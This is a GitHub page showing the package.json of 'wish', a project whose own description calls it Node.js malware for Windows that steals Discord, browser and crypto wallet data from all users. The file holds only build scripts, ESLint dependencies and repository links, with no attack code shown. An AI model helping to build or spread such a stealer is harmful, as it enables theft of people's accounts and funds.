-
Notifications
You must be signed in to change notification settings - Fork 4
/
package.json
30 lines (30 loc) · 978 Bytes
/
package.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
{
"name": "wish",
"version": "1.0.0",
"description": "Node.js malware for Windows that extracts user data from Discord, browsers, crypto wallets, and more, affecting all users on every disk.",
"main": "builder/index.js",
"scripts": {
"builder:start": "cd builder && node index.js",
"builder:install": "cd builder && install.bat",
"src:start": "cd src && node index.js",
"src:install": "cd src && install.bat",
"update": "npm i electron@latest -g",
"eslint": "npx eslint ."
},
"author": "k4itrun",
"license": "MIT",
"repository": {
"type": "git",
"url": "https://github.com/k4itrun/wish"
},
"bugs": {
"url": "https://github.com/k4itrun/wish/issues"
},
"homepage": "https://github.com/k4itrun/wish#readme",
"dependencies": {},
"devDependencies": {
"@eslint/js": "^9.13.0",
"eslint": "^9.12.0",
"globals": "^15.11.0"
}
}